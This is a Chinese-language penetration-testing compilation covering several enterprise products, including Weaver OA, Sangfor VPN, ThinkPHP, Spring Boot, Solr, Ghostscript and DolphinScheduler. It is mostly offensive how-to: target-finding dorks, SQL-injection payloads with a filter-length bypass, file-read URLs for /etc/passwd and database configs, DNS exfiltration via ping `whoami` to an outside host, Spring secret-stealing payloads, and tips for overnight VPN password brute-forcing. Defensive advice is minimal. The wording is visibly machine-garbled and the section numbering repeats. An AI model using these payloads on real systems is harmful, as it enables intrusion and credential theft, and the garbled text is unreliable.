十1、泛微OA e-cology SQL注入漏洞
1.漏洞简介
泛微OA在国内的用户非常多,漏洞以前亦非常多,但此刻在漏洞盒子托管了企业SRC:https://weaversrc.vulbox.com/, 状况有所好转
2.影响组件
泛微OA
3.漏洞指纹
Set-Cookie: ecology_JSessionId= ecology WorkflowCenterTreeData
/mobile/plugin/SyncUserInfo.jsp
4.Fofa Dork
app="泛微-协同办公OA"
5.漏洞分析
泛微OA WorkflowCenterTreeData接口注入漏洞(限oracle数据库) – 先知社区https://xz.aliyun.com/t/6531
6.漏洞利用
泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞复现:
修改NULL后为要查找的字段名,修改from后为查找的表: POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded Content-Length: 2236Connection: closeUpgrade-Insecure-Requests: 1formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0 d%0a%0d%0a%0
https://github.com/orleven/Tentacle/blob/6e1cecd52b10526c4851a26249339367101b3ca2/script/ecology/ecology8_mobile_sql
_inject.py #!/usr/bin/env python# -*- coding: utf-8 -*-# @author: orlevenfrom lib.utils.connect import ClientSessionfrom script import Script, SERVICE_PORT_MAPclass POC(Script): def __init__(self, target=None): self.service_type = SERVICE_PORT_MAP.WEB self.name = ecology8 mobile sql inject self.keyword = [ecology8, sql inject] self.info = ecology8 mobile sql inject self.type = inject self.level = high Script.__init__(self, target=target, service_type=self.service_type) async def prove(self): await self.get_url() if self.base_url: path_list = list(set([ self.url_normpath(self.base_url, /), self.url_normpath(self.url, ./), ])) pocs = ["mobile/plugin/browser/WorkflowCenterTreeData.jsp?scope=1&node=root_1&formids=1/1&initvalue=1", # 注入点为formids,分母 "mobile/plugin/browser/WorkflowCenterTreeData.jsp?scope=1&node=wftype_6/1&formids=1&initvalue=1"] # 注入点为node,分母 async with ClientSession() as session: for path in path_list: for poc in pocs : url = path + poc async with session.get(url=url) as res: if res!=None: text = await res.text() if "draggable":false in text: self.flag =1 self.req.append({"url": url}) self.res.append({"info": url, "key": "ecology8 inject"}) returm
应用安全 – 软件漏洞 – 泛微OA漏洞汇总:
https://blog.csdn.net/weixin_30855099/article/details/101191532
/mobile/plugin/SyncUserInfo.jsp
这个亦是有问题的, 但因为无公开的分析报告, 漏洞相对简单, 这儿不太多描述
7.利用技巧
(1)在这个漏洞补丁之前大概有几十个前台注入, 都差不多, 由于没公开这儿就不细说了
(2)泛微的补丁中间改过一次过滤策略, 打完所有补丁的话, 注入就很难了
(3)这儿能够绕过的原由是泛微某个过滤器初始化错误,当长度超过xssMaxLength=500的时候就不进入安全检测, 修复以后是xssMaxLength=1000000,因此随便你填充%0a%0d还是空格都能够绕过注入检测
(4)泛微后端数据库版本存在差异, 然则能够通用检测。已知泛微OA E8存在2个版本的数据库, 一个是mssql, 一个是oracle, 且新旧版本泛微的sql过滤办法并不一致因此这儿筛选出一个相对通用的检测手法(下面代码是python的" "*800 800个空格)
"-1) "+" "*800+ "union select/**/1, Null, Null, Null, Null, Null, Null, Null from Hrmresourcemanager where loginid=(sysadmin" 老版本能够在关键字后面加 /**/ 来绕过sql检测
新版本能够经过加入海量空格/换行来绕过sql检测mssql,oracle中都有Hrmresourcemanager , 这是管理员信息表
就Hrmresource表中无用户, Hrmresourcemanager 表中亦必定会存在sysadmin账户,因此进行union select的时候必定会有数据。这儿亦能够运用 "-1) "+" "*800+ " or/**/ 1=1 and id<(5",这儿运用 <5 能够避免信息超过5条, 然则会返回秘码等敏锐信息, 不意见运用。
8.防护办法
(1)即时更新泛微补丁
(2)泛微最好不要开放到公网
(3)运用waf拦击
十2、深信服VPN远程代码执行
1.漏洞简介
深信服 VPN 某个特定制品存在远程代码执行, 2019 攻防演练运用过
2.影响组件:
深信服 VPN
3.漏洞指纹
Set-Cookie: TWFID=welcome to ssl vpn Sinfor
4.Fofa Dork
header="Set-Cookie: TWFID="
5.漏洞分析
深 信 服 vpnweb 登 录 逆 向 学 习 : https://www.cnblogs.com/potatsoSec/p/12326356.html
6.漏洞利用
wget -t %d -T %d --spider %s
7.利用技巧
(1)该版本深信服VPN属于相对初期的版本, 大概2008年上下, 但日前还有761个ip开放在公网
(2)该版本较低, whomai不存在,能够运用 uname, 这儿无空格可dns传出来
(3)去除空格亦简单 cat /etc/passwd | tr " \n" "+|"
8.防护办法1.即时更新补丁2.升级到最新版
十3、深信服 VPN 口令爆破
1.漏洞简介
深信服 VPN 针对口令爆破是5次错误锁定IP五分钟, 因此这儿爆破亦不是不
行, 重点是测试平常弱口令以及分布式爆破亦不是不行
2.影响组件
深信服 VPN
3.漏洞指纹
/por/login_auth.csp?apiversion=1sangfor/cgi-bin/login.cgi?rnd=
4.Fofa Dork
app="深信服-SSL-VPN"
5.漏洞分析
关于SSL VPN认证时的验证码绕过 – SSL VPN/EMM – 深信服社区
https://bbs.sangfor.com.cn/forum.php?mod=viewthread&tid=20633
此处存疑, 时间问题无测试
6.漏洞利用
(1)深信服VPN 口令爆破 demo (这儿仅测试了M6,其他的应该差不多) #encoding=utf8import requestsimport hashlibimport urllib3urllib3.disable_warnings()import resession = requests.session()def SanForLogin(target, password, username="admin"): # 加密秘码的算法是 sha1(password+sid) # 无公开POC就不写了SanForLogin("https://xxxxxxxxxxx/", "admin")
7.利用技巧
(1)因为深信服触及的版本跨度时间达十几年, 非常多地区不同样, 然则总体都差不太多国外APT组织应该亦批量爆破了一波,加密的秘码亦便是 sha1(password+sid)
爆破亦就锁一会ip, 夜里丢一边跑着就完事了, 弱口令亦就那样些admin/123456/Sangfor/Sangfor@123
(2)倘若爆破出来了管理员密码, 管理员后台有好多处命令注入, 例如升级工具, 这儿讲起来应该是正常功能
(3)去年传闻还有前台sql注入, 然则没拿到补丁, 手头没环境, 就没分析, 看一下乌云上的老洞吧。深信服SSLVPN外置数据中心敏锐信息泄漏&SQL注入漏洞可引起getshell
https://www.uedbox.com/post/31092/
8.防护办法
(1)即时更新补丁
(2)升级到最新版
十3、平常边界制品(防火墙, 网关, 路由器, VPN) 弱口令漏洞
1.漏洞简介
大型企业常常会配置有些边界设备来守护企业内外网通信, 这儿亦存在灯下
黑的问题, 因为都数不开源, 漏洞重点以弱口令为主
2.影响组件
防火墙, 网关, 路由器, VPN
3.漏洞指纹
防火墙, 网关, 路由器, VPN
4.Fofa Dork
防火墙, 网关, 路由器, VPN 的名叫作
5.漏洞利用
【全设备】平常网络安全设备默认口令
https://www.it2021.com/security/614.html
渗透测试之各厂商防火墙登录IP、初始秘码、技术支持
https://mp.weixin.qq.com/s/OLf7QDl6qcsy2FOqCQ2icA
6.利用技巧
这个东西好多人不改默认口令, 就算改非常多亦是企业特殊弱口令,admin
root 123456永远的神
内网的安全平台便是个漏洞指南
7.防护办法
(1)设置强口令
(2)限制源自IP
十4、Thinkphp 关联漏洞
1.漏洞简介
Thinkphp 是国内很平常的PHP框架, 存在 远程代码执行/sql注入/反序列
化/日志文件泄密等问题
2.影响组件
Thinkphp
3.漏洞指纹
Thinkphp X-Powered-By: ThinkPHP
4.Fofa Dork
app="ThinkPHP"
5.漏 洞 分 析
①ThinkPHP漏洞总结 – 赛克社区
http://zone.secevery.com/article/1165
② 挖 掘 暗 藏 ThinkPHP 中 的 反 序 列 利 用 链 :
https://blog.riskivy.com/挖掘暗藏thinkphp中的反序列利用链/
③ThinkPHP 使 用 不 当 可 能 造 成 敏 感 信 息 泄 露 :
https://blog.csdn.net/Fly_hps/article/details/81201904
④ DSMall 代 码 审 计 :
https://www.anquanke.com/post/id/203461
6.漏洞利用
①SkyBlueEternal/thinkphp-RCE-POC-Collection: thinkphp v5.x 远程代码执行漏洞-POC集合
https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection
②Dido1960/thinkphp: thinkphp反序列化漏洞复现及POC编
https://github.com/Dido1960/thinkphp
③whirlwind110/tphack: Thinkphp3/5 Log文件泄漏利用工具
https://github.com/whirlwind110/tphack
7.利用技巧
①遇到Thinkphp的站点看一下版本, 或直接扫一下, 瞧瞧有无rce, 或日志文件泄密
②自从挖了thinphp的反序列化利用链以后, 这类型考题经常出没在ctf中
③实战中亦看到偶尔有能够利用的状况, 运气好可能有惊喜, 刚好有篇新出的文案中运用到了这个漏洞DSMall代码审计 – 安全客,安全新闻平台
https://www.anquanke.com/post/id/203461
8.防 护 方 法
①即时更新补丁
②升级到最新版Thinkphp
③前置WAF进行防护
十5、Spring 系列漏洞
1.漏洞简介
Spring 是java web里最最最最平常的组件了, 自然亦是科研的热门, 好用的漏洞重点是Spring Boot Actuators 反序列化, 火起来之前用了一两年, 效果很棒
2.影响组件
Spring xxx
3.漏洞指纹
X-Application-Context:
4.Fofa Dork
app="Spring-Framework"
5.漏洞分析
(1)Spring 框架漏洞集合:https://misakikata.github.io/2020/04/Spring-框架漏洞集合
(2)Exploiting Spring Boot Actuators | Veracode blog https://www.veracode.com/blog/research/exploiting-spring-boot-actuators(3)Spring Boot Actuators 配 置 不 当 导 致 RCE 漏 洞 复 现 :https://jianfensec.com/漏洞复现/Spring Boot Actuators配置欠妥引起RCE漏洞复现/
6.漏洞利用
(1)mpgn/Spring-Boot-Actuator-Exploit: Spring Boot Actuator (jolokia) XXE/RCE
https://github.com/mpgn/Spring-Boot-Actuator-Exploit
(2)artsploit/yaml-payload: A tiny project for generating SnakeYAML deserialization payloads
https://github.com/artsploit/yaml-payload
7.利用技巧
(1)Spring Boot Actuators 关联漏洞超级好用,非常多厂商一起始都不懂, 直接对外开放Spring Boot Actuators, 造成为了有一段时间每一个用了Spring Boot的厂商都出了问题,尤其是此刻非常多厂商运用微服务框架, 经过网关进行路由分发, 有些子目录一般对应一个Spring Boot起步的服务。而后子目录例如 http://123.123.123.123/admin/env,
http://123.123.123.123/manager/env亦都是能够显现的/env 能够偷session, RCE/heapdump 能够直接dump jvm中的对象, 运用 jhat 能够读取里面的对象能够遍历如下的endpoint, 1.x 2.x的目录不同样, 因此都覆盖了一下 /trace/health/loggers/metrics/autoconfig/heapdump/threaddump/env/info/dump/configprops/mappings/auditevents/beans/jolokia/cloudfoundryapplication/hystrix.stream/actuator/actuator/auditevents/actuator/beans/actuator/health/actuator/conditions/actuator/configprops/actuator/env/actuator/info/actuator/loggers/actuator/heapdump/actuator/threaddump/actuator/metrics/actuator/scheduledtasks/actuator/httptrace/actuator/mappings/actuator/jolokia/actuator/hystrix.stream/monitor/monitor/auditevents/monitor/beans/monitor/health/monitor/conditions/monitor/configprops/monitor/env/monitor/info/monitor/loggers/monitor/heapdump/monitor/threaddump/monitor/metrics/monitor/scheduledtasks/monitor/httptrace/monitor/mappings/monitor/jolokia/monitor/hystrix.strea
这儿经过 /env + /refresh 进行rce应该还有其他利用手法, 当spring boot reload的时候会进行有些默认操作,里面就有操作空间, 很像fastjson反序列化。
(2)就算实在不可RCE, 这儿亦有个技巧能够偷取 Spring 配置文件中的加密字段, 偷一下生产环境的秘码/key亦ok
eureka.client.serviceUrl.defaultZone=http://${somedb.pasword}@127.0.0.1:5000spring.cloud.bootstrap.location=http://${somedb.password}@artsploit.com/yaml-payload.yml
(3)尤其是运用spring eureka做集群的时候, 一般拿到一台服务器, 就能够传递恶意注册到其他server, 从而感染全部微服务集群eureka 一般是 server 亦是 client, 无论对方请求什么都直接返回恶意序列化xml就可以了
8.防护办法
①即时更新补丁
②开启Spring Boot Actuators权限校验
③前置WAF进行防护
十6、Solr 系列漏洞
1.漏洞简介
Solr 是企业平常的全文搜索服务, 这两年亦爆出非常多安全漏洞,
2.影响组件
Solr
3.漏洞指纹
Solr
4.Fofa Dork
app="Solr"
5.漏洞分析
Apache Solr最新RCE漏洞分析 – FreeBuf互联网安全新媒介平台https://www.freebuf.com/vuls/218730.html
Apache Solr DataImportHandler 远程代码执行漏洞(CVE-2019-0193) 分析https://paper.seebug.org/1009/
6.漏洞利用
veracode-research/solr-injection: Apache Solr Injection Research https://github.com/veracode-research/solr-injection
jas502n/CVE-2019-12409: Apache Solr RCE (ENABLE_REMOTE_JMX_OPTS=”true”)
https://github.com/jas502n/CVE-2019-12409
mogwailabs/mjet: MOGWAI LABS JMX exploitation toolkit https://github.com/mogwailabs/mjet
7.利用技巧
看到锤就完事了, 漏洞太多了, 一片一片的
遇到mjet连接超时,这是目的服务起返回了错误的stub(内网位置, 平常于docker), 能够运用socat进行流量转发, 后记里面有详细操作
8.防 护 方 法
①升级到最新版
②不要对外开放敏锐端口
十7、Ghostscript 上传照片代码执行
1.漏洞简介
Ghostscript 是图像处理中非常常用的库, 集成在imagemagick等多个开源组件中, 其 .ps文件存在沙箱绕过引起代码执行的问题影响广泛, 因为上传照片就有可能代码执行, 非常多大厂中招
2.影响组件
imagemagick, libmagick, graphicsmagick, gimp, python-matplotlib, texlive-core, texmacs, latex2html, latex2rtf 等图像处理应用
3.漏洞指纹
.ps/.jpg/.png
4.漏 洞 分 析
ghostscript命令执行漏洞预警
https://www.anquanke.com/post/id/157513
5.漏洞利用 Exploit Database Searchhttps://www.exploit-db.com/search?q=Ghostscript vulhub/ghostscript/CVE-2019-6116 at master · vulhub/vulhubhttps://github.com/vulhub/vulhub/tree/master/ghostscript/CVE-2019-6116
6.利用技巧
倘若发掘网站能够上传照片, 且照片无经过裁剪, 最后返回缩略图, 这儿就可能存在Ghostscript 上传照片代码执行dnslog 能够用 ping
`uname`.admin.ceye.io 或 ping `whoami`.admin.ceye.io保留成照片, 以后用起来方便, 有个版本的 centos 和 ubuntu poc还不同样, 能够这般构造ping `whoami`.centos.admin.ceye.io / ping `whoami`.ubuntu.admin.ceye.io分别命名为 centos_ps.jpg/ubuntu_ps.jpg, 这般测试的时候直接传2个文件, 经过DNSLOG能够区分是哪个poc执行的
7. 防护办法
升级到最新版
十八、泛微云桥复现
1.其 实 没 什 么 复 现 的,未 授 权 读 取,直 接 调 用 exp 就 OK http://www.xxx.com/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt http://www.xxx.com/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt
2.任意读取linux的passwd值 可在响应包中JSON中包括ID的32位值再次请求可得到/etc/passwd值http://www.xxx.com/FileNoLogin/32位MD5值http://www.xxx.com/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
3.任意读取winodws下的win.ini值
未授权任意文件读取,/wxjsapi/saveYZJFile接口获取filepath,返回数据包内显现了程序的绝对路径,攻击者能够经过返回内容识别程序运行路径从而下载数据库配置文件害处可见。
(1)downloadUrl参数修改成需要获取文件的绝对路径,记录返回包中的id值。http://www.xxx.com/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt
(2)经过查看文件接口拜访 /file/fileNoLogin/id
(3)其他利用技巧(读取任意目录文件)
简单说说昨天泛微云桥的报告,输入文件路径->读取文件内容,咱们读了一下代码后发掘这还能读取文件目录。参数不填写绝对路径写进文本内容便是当前的目录,产生了一个新的漏洞 “目录遍历”
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///D:/&fileExt=txt
目录遍历+文件读取,咱们能做的事情就非常多了,例如读取管理员在桌面留下的秘码文件、数据库配置文件、nginx代理配置、拜访日志、D盘迅雷下载: d://ebridge//tomcat//webapps//ROOT//WEB-INF//classes//init.propertiesd:/OA/tomcat8/webapps/OAMS/WEB-INF/classes/dbconfig.properties 泛微OA数据库
4.修复意见:
关闭程序路由 /file/fileNoLogin
十9、网瑞达webVPN RCE漏洞
1.漏洞描述
WebVPN是供给基于web的内网应用访问掌控,准许授权用户拜访只对内网开放的web应用,实现类似VPN(虚拟专用网)的功能。近期网瑞达的webVPN被曝出存在RCE的漏洞。
2.修复意见
意见去官网更新最新版本
二十、Apache DolphinScheduler高危漏洞(CVE-2020-11974、CVE-2020-13922)
1.漏洞描述
Apache软件基金会发布安全公告,修复了Apache DolphinScheduler权限覆盖漏洞(CVE-2020-13922)与Apache DolphinScheduler 远程执行代码漏洞(CVE-2020-11974)。
CVE-2020-11974与mysql connectorj远程执行代码漏洞相关,在选取mysql做为数据库时,攻击者可经过jdbc connect参数输入
{“detectCustomCollations”:true,“ autoDeserialize”:true} 在DolphinScheduler 服务器上远程执行代码。CVE-2020-13922引起普通用户可经过api interface在DolphinScheduler 系统中覆盖其他用户的秘码:api interface
/dolphinscheduler/users/update,请关联用户即时升级进行防护。
2.影响范围
Apache DolphinScheduler权限覆盖漏洞(CVE-2020-13922)
3.受影响版本
Apache DolphinScheduler = 1.2.0、1.2.1、1.3.1
4.不受影响版本
Apache DolphinScheduler >= 1.3.2
Apache DolphinScheduler远程执行代码漏洞(CVE-2020-11974)
5.利用POC: POST /dolphinscheduler/users/updateid=1&userName=admin&userPassword=Password1!&tenantId=1&email=sdluser%40sdluser.sdluser&phone=
利用漏洞:需要登录权限,供给一组默认秘码。
该漏洞存在于数据源中心未限制添加的jdbc连接参数,从而实现JDBC客户端反序列化。
1、登录到面板 -> 数据源中心。
2、jdbc连接参数便是主角,这儿无限制任意类型的连接串参数。
3、将以下数据添加到jdbc连接参数中,就能够直接触发。
POST /dolphinscheduler/datasources/connectHTTP/1.1type=MYSQL&name=test¬e=&host=127.0.0.1&port=3306&database=test& principal=&userName=root&password=root&connectType=&other={"detectCustomCollations":true,"autoDeserialize":true}
关于MySQL JDBC客户端反序列化漏洞的关联参考:https://www.anquanke.com/post/id/203086
5.修复意见官方升级
日前官方已在最新版本中修复了此次的漏洞,请受影响的用户尽快升级版本至1.3.2进行防护,官方下载链接:https://dolphinscheduler.apache.org/zhcn/docs/release/download.html
如有任何问题、意见、合作、投稿请加get_system,以方便即时回复。
|